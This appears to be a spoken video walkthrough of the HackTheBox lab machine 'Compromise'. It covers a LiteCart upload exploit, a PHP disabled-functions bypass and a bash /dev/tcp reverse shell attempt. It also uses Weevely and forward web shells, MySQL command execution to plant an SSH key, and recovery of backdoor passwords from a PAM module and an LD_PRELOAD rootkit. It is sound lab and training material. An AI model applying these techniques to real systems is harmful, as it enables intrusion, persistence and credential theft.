What's going on YouTube? This is Ipsec. I'm doing Compromise from HackTheBox, which I really like this box because the author put in a lot of work to make it true to its name. The idea of the box is you're coming in after a hacker and have to find out what he did by exploiting the web app and then kind of tracing his steps. The blue team did some minor security things like put some PHP disabled functions, and they believe they broke his ability to get onto the box. So we'll do this box two different ways because, again, the author put in a lot of work. He didn't just put one persistence technique, he put two because no hacker would ever really just do one persistence. They always lay multiple ones so the blue team never knows if they truly got them off. So the very first way we'll do the box is through bypassing PHP disabled functions and then going into a PAM Backdoor, which lets you put some skeleton passwords in that let you always authenticate via like SSH or anything. The second way we'll go on the box, we'll live in PHP. We won't bypass disabled functions. We'll use a Weevely shell to execute stuff in the database and find out the hacker did some minor tweaking in MySQL to allow it to execute commands. So from that PHP shell, we can use SQL to execute a command to let us on the box by dropping an SSH key. And then we'll find a LD preload rootkit that will reverse and figure out how that LD preload rootkit can get us a shell in the box or a privesc. So with all that being said, let's jump in. As always, I'm going to start with the nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the nmap directory and call it compromised, and then the IP address, which is 10.10.10.207. I'm also going to run the nmap with sudo because I'm not root, and if you don't do it, sometimes its host identification will fail and you'll just get host as offline. Also, I've already ran this because it can take some time to run, so let's just look at the results and see the ports that are open, which is SSH on port 22, and its banner tells us it's an Ubuntu box. We also have Apache on port 80, and its banner tells us it's an Ubuntu box, and also that it's an online store selling legitimate rubber ducks. So I definitely want to go take this out because that piqued my curiosity. So going to this page, we do see LiteCart, and indeed it is a rubber duck from Acme that is on sale for $19.80. So the very first thing I'm going to do is take a look at this copyright. It is a recent copyright, so chances are this is dynamically generated or the website is up to date. I'm also going to go to GitHub, LiteCart, because this sounds like an open source product. And I just want to see if there's any files like in the root that may include the version. So looking at the README, going down, doesn't see that. The main thing I'm looking for is like a changelog.md or changelog.txt. I don't really see that, so I'm going to move on. I'm also going to search for .git to see if this exists, and it doesn't. So let's run a GoBuster on this so we have some type of recon going on in the background. So GoBuster, dir mode -u for URL, -w word list, and I'm going to run the wrapped small words because I just like this word list more. I think the reason why I switched from like the other one I've done in a lot of videos, I forget what it's called. It's an ls user share word list, GoBuster, then directory list. The reason why I switched away from that is because it didn't have like .git, I believe, in it, and that was enough to make me say, okay, this one is out of date. Let's go for a new one. So right now, I like wrapped small words.txt for the initial brute force, and we'll just send it to the out file gobuster.out. Make sure this runs. It looks like it does, and right off the bat, we see /backup. So let's take a look at what backup is while that runs. So going to /backup, we have a.tar.gz. And I just noticed, we have this shop directory. We probably should run a second GoBuster in this. So what I'm going to do is we'll just go copy a GoBuster. And I'm going to run it again. This will be gobuster.shop.out. And I'm also going to add the extension PHP because this is a PHP web app. And now we have both of those GoBusters running. So taking a look at /backup, let's download that one file. So a.tar.gz. So I'm going to save the file. Then we'll open up a new pane, make dir downloads, and let's move our download a.tar.gz to this directory. Enter xjvf, that's it, a.tar.gz. It's not a bzip file. It's just tar. Okay, so the .gz was wrong. Funny. I guess no one can type tar commands right the first time. It's not just me. And looking at lsla, we see this .sh.php file. Let's take a look at it. And it looks like it's just a shell. And hence the name of the box, compromised. Chances are maybe we're like coming in after an attacker. So let's take a look if this file exists. It doesn't. And I'm going to go back to my GoBuster. Did any finish? It has not finished yet. What I want to do is take a look of everything that completed and try .sh.php. So let's see. vtodo.text hunt for .sh.php. Okay. So at least we have that down. And going more into this, what can we do? If this is a post compromise, we can identify files that have changed. And there's two things. Let's see, ls full ISO, I think. Let's see what this is. Time style, okay. So -- time style equals full ISO. What? LSLA. Maybe it's just space full ISO. Let's see. Did I type with something? Paste. Get rid of the dollar. I must have typoed something. Oh, it's time - style. So I want to bring this up. Whenever you do some type of post compromise, it's always important to look at how the timestamps and various directories are handled. So in this tar, it was not archived up with keeping the entire timestamp, only up to the seconds. So any file that was modified by the attacker is probably going to have this populated. And if you ever see two files with the same exact timestamp, that is suspicious because this is super duper in depth. I mean, I think it's like decasecond, then centi, then milli, then micro, then nano, then pico, then femto, then atto, then zepto. So I think this is a zeptosecond. Maybe I miscounted one and it goes all the way to yocto, but it's a very small measurement of time. So like if you did like, let's just go up one directory, echo t to 1 and echo t to 2. And we do this timestamp, we can see, these are the same. Let's see. Echo t to 3, echo t to 4. Does the timestamp ever change? It doesn't. I think that's something my bash is doing. All I'm trying to say is these timestamps are relatively unique because it goes super in depth. Example failed, but I think on Windows you'd see that different thing or see it differently. Anyways, let's just carry on and we'll do the next common thing and just find the latest files modified. So I'm going to do find.printf, and this is going to let me change like the order of everything being displayed. So we'll do find.-printf %t. This is going to be for timestamp. And then we want to add p, and this is going to be the file name or path. P stands for path. And then I'm going to add a line break after that because if I don't, it doesn't put the line break in. So this is like modifying each entry. So now that I have this, just printing the timestamp, and then the file name. I can send that command over to sort. And let's also say dash type is F for file. And this will let us sort for files recently modified. So we can see .sh.php was dropped at 2:05, and then around 5.5 hours later, or actually days later, or months later, 05, 09, we have these two files being modified, admin login.php and include. So let's take a look at admin login.php, and I'm just going to like the bottom and the top to see if anything sticks out. And we do. We have this log file. So I'm going to grep file put on that file, and we're going to hunt for this file. It's probably going to be in admin. So if we do /shop en, is it shop admin, I think? Because that's the directory it's in. And then it began with a period. We get a username and password. So that was pretty easy. Let's try SSHing into the box. So SSH admin at 10.10.10.207. Paste the password, and we don't get in. If we go back to LiteCart, we could see if there's any potential usernames. So if we click on like a duck, do we see who listed it? We don't see anything of that sort. If this was like a blog or something, then potentially, but we don't have anything. So let's just go back to shop admin and try logging in with these credentials. And it looks like they work. And we got a note here saying your account was previously used by another location or hostname, kali-pentest.fiosrouter.home. So chances are some hacker got into our system. We also have .ht access is protected. And is our GoBuster finished? It is. So before we move on, let us use fuff real quick. So GoBuster out. Let's grep -v 403. Oh, there's only 2 files. So we could try /shop/.sh.php if we wanted to see if that existed. Wait, did that just exist? It looks like it does exist, but we're not getting any output. Let's see. Go into downloads, shop, ls, or cat.sh.php. It should be doing request cmd. So if I do $cmd equals who am I, nothing happens. So looks like this shell is dead. If we go to searchsploit and search for LiteCart, we have this LiteCart file upload. So I'm going to look at this with searchsploit-x. And this is probably something we should have done at the very beginning and looked at it. Admin login page, admin password, admin username. And let's see. I guess we can just run it. So searchsploit-m to mirror it. And then Python 4526 mechanize pip3 install mechanize to install this. It's already installed. Oh, this is Python 2, isn't it? Less 45267 print. Yeah, this is a Python 2 app. So instead of dealing with Python 2 dependencies, I'm going to examine how this works, and we'll try to do it manually. So let's see. User agent. So it goes to the login form, and then it goes to this URL. Did I copy to my clipboard? It did not. I'll open up in less and after so I can copy. Copying Vim to clipboard is just a pain. So it looks like once it goes to this URL, it's uploading something. So we got upload here, and it's putting this PHP web shell, and it's changing the content type to application XML. And then it goes to up1 directory vqmod/xml to view the file. So this is a relatively simple exploit. So let's just open this up in less so I can copy it a bit easier. One day I'll memorize how to copy to clipboard in Vim, but that day is not today. So let's copy. And let's go back over here. We want to go to shop admin. And then we do that question mark to go to this page. And we can upload a PHP web shell. So let's go make dir upload. And we can v shell.php. And let's just do system request ipsec like that. Actually, keep it like the attacker did and do cmd. That looks good. So let's upload this. And we also, before we upload, want to send this over to BURPSUITE. My BURPSUITE is now intercepting. So we can go to home, HTB, compromised, upload, change this to be all files, shell.php, upload, BURPSUITE, send it over to repeater, and we change this from application PHP to XML. Send it, we get a 302 found, and I'm going to turn off BURPSUITE. And I wanted us to go to up1 directory, so we get rid of admin, vqmod/xml, I think, shell.php. And I'm going to do cmd equals who am I? And we get nothing still. So the next thing I'm going to do is, let's just do echo hello world, upload, and it prints. So chances are there's some type of PHP disabled function. So I'm going to do phpinfo after this. We refresh the page, and we can see the config. The reason why I did echo first is sometimes phpinfo is actually a disabled function, and it doesn't print out. So echo is never going to be disabled. So I always start with the simplest thing first, and that will help me. We can do system, and we can look at all these disabled functions. So let's copy this. Let's go over here. V disabled.txt, paste, and we'll convert that to lines. And we can see system is disabled. Pass-through, popen, shell exec proc, a bunch of things are disabled. We even have things like mail and putenv disabled, and file put contents and fwrite. So they're really trying to prevent us from writing a file to the server, putting all these disabled functions in, as well as executing things. We could go to like hacktricks, PHP, disable, bypass, I think will get us there. Disable functions bypass mod. That's not what I was looking for. Let's see, disabled functions, bypass. This is probably it. Yeah. So this is a great page to read, and we can do PHP code exec with these functions. That's not like system and things. Does this go into system? This is blocking, bypassing the like open baster. And open baster in PHP is just a way to lock a web application in a directory. So here's a auto-discover script. I don't like running auto-discovers. That's Chankro. PHP capabilities, other PHP functions. It doesn't list like let's see, curl exec. So it's not listing a list of all the ways to run commands, or maybe shell exec. Shell exec. Okay, yeah, it is. So exec is on the list. Pass through is on the list. System shell exec, popen, proc open. Is this on the list? By default, or not so mono, you need a load. Let's see, is this on the list? It is on the list. And then mail is on the list, so you can go through these and see if there's any quick wins. Doesn't look like there's a quick win. So I'm going to go to Chankro. So let's do cd opt Chankro, and I'm just going to run Python. And this application is Python 2 as well, but thankfully, it doesn't have any weird libraries I need to install, so we can work with this. I'm going to look at my input, so rev.sh, and this is just a bash reverse shell, and the IP is still the same. So let's just do Python Chankro. Architecture is going to be 64-bit. Input is going to be rev.sh. Output is ip.php. And our path to where our uploaded files are. Let's go back over to phpinfo. And let's do var www html. And it's going to be in this directory. So paste that. And it said it created the file ip.php. So let's take a look at what it looks like. Very annoyingly, we have a long base64 string called hook. And I think this is the beginner of an elf file, that FOV. Let's see. The next line is an interpreter, which I think this is just a reverse shell. So it's doing file put contents, chankro.so, and it's doing a base64 decode of hook, which was that super big elf file we saw base64 up there. And it's also doing one of acpid.socket interpreter, and it's putting the environment Chankro. So this is the bash reverse shell. It's not actually interpreter, it's just what they call that payload. And then we put chankro.so and call mail. It's not going to work, but I think there's other things to do than mail. And then again, it's not going to work because putenv is on the blacklist. If we look at that, where's disabled? Let's see, be disabled. Find.grep disable. Putenv is on the disabled function list. So this whole thing is blocked. But there is one piece I wanted to show you, and that's when you manually want to upload files via the website or burp. The super easy way to do it would be this. Let's do hook64.so. So we base64 encode this, and we want to put this on one line, so W0. And then we're going to xclip-selection clipboard. So now we just copy that base64 to a clipboard. So we can now go into BURPSUITE and paste the base64, then highlight the base64. And you can either press Control-Shift-B or right-click, convert selection, base64, decode. And now we can upload this chankro.so file here. So if we did that, and then we go over here, and we try to download it, chankro.so. What? It should have let us download. Let's see. Chanro. I typed that. There we go. You chose to open this file. So that is how you would have uploaded files to the server. But later on, the putenv is broken because that's disabled, and I don't know a way around this. So without knowing a way around this, we can't do the LD preload thing and execute mail, which breaks all of this. So Chankro, kind of a rabbit hole. I just want to explain why I wasn't using it, because all the other like PHP bypass functions, I always use that application. I forget what box it was, but I'm sure if you go to ipsec.rocks, you'll find it. So let's go back over to Hacktricks, and let's see. Module version dependent bypasses. So here's one, PHP 7 to 7.4. If we click on that, it's from this. And if we look at the PHP version here, it's 7.2. So we can try this one. So let's copy. Oh, there's a copy button. Copy. And then we will paste. Send it. And we called this, what is it? Shell.php. So now if I go to shell.php, we have the output of, looks like uname. Let's see. Uname-a. That is right. So now we can change this. So request ipsec. And let's see if we can get this to run codes. Ipsec equals who am I? ID. Do we put this in quotes? I don't think so. Pwn on request. That's not it. Underscore REQUEST ipsec like that. That should work. I'm doing something stupid probably. And I'm definitely right about doing something stupid. I have an unbalanced number of parentheses. So I'm going to get rid of that. Send that. Run. And now we can change the output of our command. If I type that right, ID. So now we have changed the output. Let's send this back over to BURPSUITE. Proxy, intercept is on. Send this to repeater. And this is going to be run command. And this can be upload file. Just trying to stay organized. I'm going to change this request method. There we go. And let's do bash-c, bash-i, dev tcp 10.10.14.4 9001. And let's copy all this. And see. So nc lvmp 9001. Run it. And we don't get a response, but we don't get a shell either. So something is wrong here. I'm going to do a which curl. Curl is on the box. Curl 10.10.14.4. nc lvmp 80 with sudo. And we can't get here either. So I'm going to guess there's something with iptables. So I'm going to do find/etc grep iptable. And let's see if we can view roles.v4. Cat. And let's see. The output let's see. The output requires the source port to be 22 or 80. So that's why we can't. The default is set to drop up here. So if there's not an accept, then it gets dropped. And this related established is what allows our web server to work. So I'm going to use my forward shell technique that I've demonstrated a long time ago and I haven't really touched in a while. So ipsec forward shell. Let's turn BURPSUITE off. Run it. And this is something I created. I don't know. There wasn't really a blog post or anything about this. If you go to ipsec.rocks and type /shell, I explain it in several videos. So LiteCart is probably the first video I use it at. I'm going to call it for.py, set paste. Let's see. We want to change the URL. So the URL is going to be up here to shell.php. Okay, this is going to set the session. And I'm just going to search for modify this. Modify. Okay, this is the payload. And I have a note here saying this was last used when I uploaded it for shell shock. So that's why we do it in the header. So we're going to modify this to be data is equal to, what is it, ipsec cmd, because we're going to send a post request. So request dot post, instead of headers, we can do data equals data. And I think that's all I have to do this. So if you don't know what this is, it creates two files, two named bytes to be more precise, input and output, and then uses these to do your shell. So when you want to run a command, it writes the command to input, that the shell will then run the command and write it out to output. Oh, shoot. Set paste. Why'd I do that? Copy. I was thinking about pausing the video and redoing it, but oh well. There'll be a pretty big mistake to edit. If in case I didn't modify everything exactly as I showed in the video and had a typo, that's why I don't want to just cut. So let's see, this. Sometimes the escape key does not work and it's annoying. CMD payload. This can be ipsec. Okay. Headers, data equals data. As I said, escape key doesn't always work. There we go. So if we do Python 3 for.py ID, does it work? It's probably going through BURPSUITE. ID, run it, get the result. Something's not happening. Let's see, what did I screw up? So let's un-URL encode this. So it's running that to this file. When I was redoing this, I did not change this to post. Turn intercept off, ID, there we go. So now we have a interactive session on this box. So from here, we're taking the whole theme of this being a compromised box. And I'm going to look for the privesc or persistence of the attacker. And that's where at the very beginning of this video, when I was talking about the timestamps, it's going to come in handy. So do I have full ISO? I do in here. So in this lib directory, let's see. Let's not do directories. So let's do find dot dash printf %t plus %p new line. Okay. Let's say type f. So just like tar archives, Debian packages won't have the full timestamp. And users should really never go into lib. And as long as users don't go into lib, then the timestamps will always be all these zeros of standard packages. So since dpackage installed this sendmail library, it didn't put the full timestamp there. But if a user edited that or manually put it there, anytime you interact with the file system, it's going to use the full 32 bits for the timestamp. So what we're going to do is a grep-v to look for files that don't have that. And we can see Python. Python notoriously writes into /lib with pip. And when it does so, because it's downloading the file and compiling and doing a bunch of things, it puts the full timestamps in this. So we can then go and ignore Python. So let's do grep-v on zeros or Python. And really, there's very few files that we have to go through. We can see I have Python Apache module from Crime Stoppers on my box. That's funny. So I found a persistence on my box that I forgot about. So yeah, always funny. So let's go and do the same thing here. So find /lib, and I want to paste all this. So let's go here, copy, paste, and see what we have. So that's not too interesting, but we have this .pam_unix.so and pamunix.so. So this one is very interesting. It's with a period. I'm also going to run like MD5 some of both of these files to see if they are the same. So let's copy and do it on both of these. And the files are the same. So it doesn't matter which one we grab. So I'm going to cp this to var www html shop. What was it? Let's go to repeater vcube mod xml. Copy it there. And then we're going to download it and analyze what this is. PAM is the pluggable authentication module for Linux. So if you want to create like a plugin that happens when you log into a box, you do it with PAM. An example for that would be like two-factor authentication. So if you wanted your YubiKey or something to happen with SSH, you'd put a PAM module there. So if you wanted to do persistence though, you can inject malicious things into that login pipeline and do things like backdoor passwords or copy a user's password elsewhere. Kind of like we saw the modified PHP login earlier in this box, where they copied all the usernames and passwords of trying to log into the application to a file. So it's kind of like that. Let's move downloads. What was it? What? No, just PAM Linux. Okay, there's no pamunix.so here. And we can do opt gija run. And we're going to analyze this file to see if we can figure out what its backdoor is. So let's close file, or we click on this little dragon, and then we can press I to import. And let's do, not downloads, HTTP. And then the next thing is going to be compromised. And then downloads, pamunix. Okay. Analyze it, select all, sure, and let's just wait for this little bottom thing to finish, and then we will take a look at it. So it's now done, and if we click around, there's just so much to look at, like all these functions, like there's not a good known starting point. So I'm going to Google PAM Backdoor. So I'm just going to go over here, PAM Backdoor. And right off the top, PAM Backdoor GitHub. And this is a script that's going to put a backdoor password. Sounds like what we want to do. And this is using the patch command to edit something around line 170 of this file, pamunixauth.c. So let's take a look at what function this is. .c, and it was around line 100, and it's PAM SM authenticate. So let's take a look in our Ghidra onto functions, and we want to go to PAM, and then it was what? PAM, whoops, I think it was SM authenticate. Here we go. And we have it right here, and we see this variable backdoor. So that sounds very ominous. We can look at this, and let's see the decompiled code. Where is this backdoor? If I just highlight this right here, does this go here and highlight? It doesn't. Let's see. This decompiled output is sometimes hard to read. Bad username. Ah, right here. So we got 2 pointers, or those are not pointers. This looks like just hexadecimal values based upon the addresses they begin with. So let's go over to CyberChef. And let's put these values in. So there's 1, and here's 2. And what is it doing with these? Move, move. I think it's just adding these 2 values together. So let's go from hex and try logging in. So where's my shell? Let's go to Python. I'm going to type upgrade, which is going to do the PTY upgrade for me. And if I do su dash, paste in the password, authentication failure. So that wasn't it. This could be an issue with endian. So let's do swap endianness, and the data format is going to be raw. So let's copy this. Su dash, paste this, authentication failure. So let's disable endian and put it like this. Su dash, paste, authentication failure. Put this. Ooh. Could have been the pad incomplete words option. Su dash, paste. So let's go back, disable pad incomplete words. Su dash, paste. And there we go. We're now root of this box. So if I go into root, we can read root.txt. So that is one way to do this box. But because it's a compromise scenario, it was actually has 2 different, persistence methods. And there's a different way we can actually do the initial web shell instead of using my forward shell. So let's go back and do this box again from the file upload piece. So this time we're not going to use the forward shell, and we're also not going to use the PAM Backdoor. So this should be fun. To start things off, we're going to go to GitHub and search for a PHP shell called Weevely. And we don't have to use Weevely, but the reason why is it does a lot of things natively in PHP. So the issue we run into is we can't really execute bash, but we can use PHP to do a bunch of other dangerous things. And instead of writing all those functions by hand, which I think we've done before, like reading files, getting files, and doing those things, we can just use Weevely and have it do it for us. So if we execute it, we need to do Weevely and then generate And it's going to create a launcher for us, or I forget what it's called, but generate, put a password in, which is going to be please subscribe, and then the file name, which will be, let's do please sub.php. So it generated please sub.php with password. So if we cat this, we can grab this file, which looks nasty. It is definitely obfuscated. So let's go back to our upload file, and we're going to paste a Weevely shell. And we're going to name it please sub.php. Boom. So now we can do Weevely and then the URL. So HTTP 10.10.10.207. I don't know why I'm typing this when I can copy and paste and avoid typos. So let's copy up to here. Paste please sub.php and then the password please subscribe. Bang. And now we have a Weevely shell. So we can do :help to see everything we can do. And we could try things like just execute PHP shell sh. I think if we don't specify anything, shell sh is default. So let's see. Shell sh, it's not going to work because it uses system. But yeah, it fails. We can also do like, shell su or shell scan. But what we want to do is look at things like, let's see, file cd. Where's file read? So we can do file read to read files from the system. So like file read etc passwd. And it's going to use probably PHP's file get contents to read this file. So we can look at it. And one thing is super interesting. MySQL has bin bash as a login shell. Generally, MySQL is set to no login because there's no reason for that user to have it. And as I say that, grep MySQL. Okay, yeah, MySQL is set to bin false on my machine. So I just want to make sure it wasn't like Oracle and they expect you to do things on a shell. But no, MySQL's default should be bin false or bin no login. So that is definitely interesting. Let's go and try logging into the database. So we do have the backup of this. So if we wanted to make it lives easy, we could just find .grep config. And here's the config inc.php. And if we go down, let's see, db user root, and the password is change this. We could read this file on the server as well. So if we do file read, var www html, this is going to be shop includes config inc.php. And search for pass here, we still have the same password. So now in this, we can do, what was it? There's an SQL login. So execute query, yeah. So SQL console. And let's see, -h, is there help? There is. -user root -passwd, change this. And now we're in a SQL prompt. So we can probably do show databases. Yep, so we can do everything we want. We could go into ecom and select all the users, but this is a post-compromise thing. So I'm going to look at user-defined functions on this box first, and we do see there is libmysql.so. And if you're curious what this is, you can probably Google it, and you'll find someone talking about how to execute commands with this. Let's see. Execute command. Let's see. MySQL user-defined function execute command. So there's plenty of things. I always like defaulting to Hacktricks first to see if it helps. Doesn't look like it's right easy to find there. But this blog post should be good with doing it. Essentially, it's a trick around MySQL to have MySQL execute commands. Normally, you can't do it, but you create a user-defined function, and I think you need root privileges to do it because you have to write a library to disk, which is, where is it? This. And yeah, so let's try select select exec cmd ID. We need to do quotes, and we can run commands. So if we do pwd, we are in verlib MySQL, and I think that's the place. Just going to the passwd file. That is his home directory. So if we create a .ssh, we should be able to get in. And since this is, can I still do this? Okay, I'd have to exit. But I was going to say, since this is a like post-compromise scenario, we may just want to check for keys. So we can probably do exec cmd ls pwd. You can just do lsla.sh, and nothing is in here. So if can we write something in here? So touch.ssh authorized keys, if I do the correct spacing. What? Let's do makedir.ssh. Touch. I'm trying to see if we can list a file, but weird. pwd lsla. Okay, we're only getting the very bottom line. So head -1, 2. Let's see, tail -1, 2, 3. So this is a way we can read the output, or we could probably just base64-w0, and then we can copy this, and let's just go to CyberChef again. If you can't tell, I love CyberChef. I've done this in a few videos recently. But we can see all the files here. So there's no like ID RSA file that would have a private key. So let's create one ourselves. So I'm going to go up, SSH keygen -f, and I'm going to call this MySQL, I guess. No password, cat MySQL, and we want to do the public key. So we can copy, go back to our shell, and we can say echo into .ssh authorized keys, and I'm going to chmod 600 sh authorized keys. Okay. chmod 600 MySQL sh-i MySQL MySQL at 10.10.10.207. And now we have logged on to the box as the SQL user. So we no longer have that MySQL shell, we have a full shell in this box. So from here, we could go and find that PAM backdoor just like we did before, but there's some other things we can do on this box. The first being going up to a different user. If we just do an ls in this directory, we see this strace-log.dat file, which is unique. Normally doesn't exist, and it's the output of strace. And again, hyping the importance of timestamps. If we do time style equals full ISO, and we can see most of the files in this have the full 32-bit timestamp. However, the one the hacker or attacker used does not. So he probably used the touch command or something to set this back in time. So always, always important to understand timestamps as a defender and also as an attacker. You may just be standing out and you just don't know it because this is your output. And people don't dig into the full timestamp of the file system or on the file system, which goes into either Zepto or Yocto seconds. But yeah, so if we look at this output, it is the strace output. And strace is like a syscall trace. And there's a pretty cool blog post if you do like poor man keylogger strace, I think. Yeah. This is talking about using strace as a keylogger, because when it does that sys.write to write something to terminal, it logs the key. So if we grep read on this log file, if I do this in a single quote, we see them typing things in. So here they did sudo pkill strace. So we can kind of snoop what they did. Let's see. So the password right here, change this. And they did, what is it? TUNAPL. I don't know what that is. Oh, netstat. I think it was, who was it? Moose. Moose told me the funniest thing here. Instead of doing tnut, you can do peanut. PNUT. But yeah. Shoot. I forgot what I was going in. I was thinking about netstat flags and just remembering a story, but we have MySQL -u root password, and we have this strong password. And this is before they did change me. Oh man, that yellow hurt my eyes, and when I got rid of it, it went away. But we have something here. So let's type this out. Where is it? Right here. So 3* NLJE 32I $FE. Let's see what this is. So SU dash paste. Doesn't work. Etsy passwd SU dash sysadmin paste. That was not it. Maybe I typed it wrong. Or maybe there's a different password. Select. Let's see. $3* NLJE 32I $F. Lowercase e. Typo. Let's try this. Make sure that's in my clipboard. Can't SU to root. Let's try sysadmin, and we can. This user doesn't really have anything, I think. If we just look at groups, he's in his own group. So there's nothing really special about this user other than that's where user.txt is. We can do everything else from MySQL because it's another like persistence mechanism. So if I just do LDD on any file, and And if you're confused what I'm about to go into, it's LD preload. If you go to HackTheBox's YouTube channel, youtube.com/c HackTheBox, and I have a video up here, I believe, that I'd recommend. This blue team gameplay with process monitoring. I'd recommend looking into that because I go all into LD preload. But there is this file here that is unique, libdate.so. That is not a file that's normally on this box. So if we look at it, whoops, lsla, let's do time style equals full ISO, and it has a timestamp of what we'd expect, and it's back then, so nothing really stands out here. If we find %t, let's do lib dash printf %t plus %p \n, and grep for this timestamp. Does anything come up? So it's with everything else. So this backdoor actually blended in pretty darn well. If it did something to hide itself from the LDD command, probably would have a really tough time finding it, because it could also edit itself from, it's probably in like cats etc ld.so.conf probably, or ld.so.preload. You can also see it there. But this could hide itself from this file and also the LDD command if it was a good rootkit. So let's copy this file. So copy libdate to be var dub html. What is it? Shop. It's like VQ. Yeah. VQ mod XML. We can't because we're MySQL. Base64 libdate.so -w0. And we'll copy it this way. I guess I could have SCP'd it. Copy v libdate.so.b64, paste base64-d. So let's MD5 sum it real quick. 9982. MD5 sum 9982. I just look at the first two and last two. If those match, chances are it's the same. If they don't, then man, something like magical happened. Let's see, libdate.so. What? There we go. Analyze, select all, analyze, okay. Okay. So there's only one thing in export, and that is this read. So this is overwriting the read library. And let's see. So upon read, it's going to check if to, and then all these hex values are in. And if they are, it's going to set GID and UID and execute a shell. If not, then it's going to return and probably execute the system read function right here. So let's go over to CyberChef. And let's see. Delete that. 0x. There we go. 77 6b 65 4f 553473 6a 763834 6f 6b 2f. I typoed that. Hopefully I didn't typo anything else. I can type it again real quick. 0x776b654. Oh, my numpad's not on. I was like, say, that doesn't look as long as I thought it was. 0x776b65 4f 553473 6a 763834 6f 2f. Okay. So we can say from hex. And remember, it starts with a 2 right here. So I'm going to copy this. And now all we have to do is execute a setuid binary that uses the read function. So su does. So here it's executing read. I'm going to paste the password of that LD preload rootkit. Authentication failure. Oh, I did not do the 2. And we see it just comes back with a hashtag. If I type ID, we can't see my input output. I'm typing env enter, and we just see the PWD. So I'm going to type export term is equal to xterm, and then reset, reset. And now our terminal is fixed, and we can read root.txt. So that is the second way to do this box. Hope you guys enjoyed it. Take care, and I will see you all next week.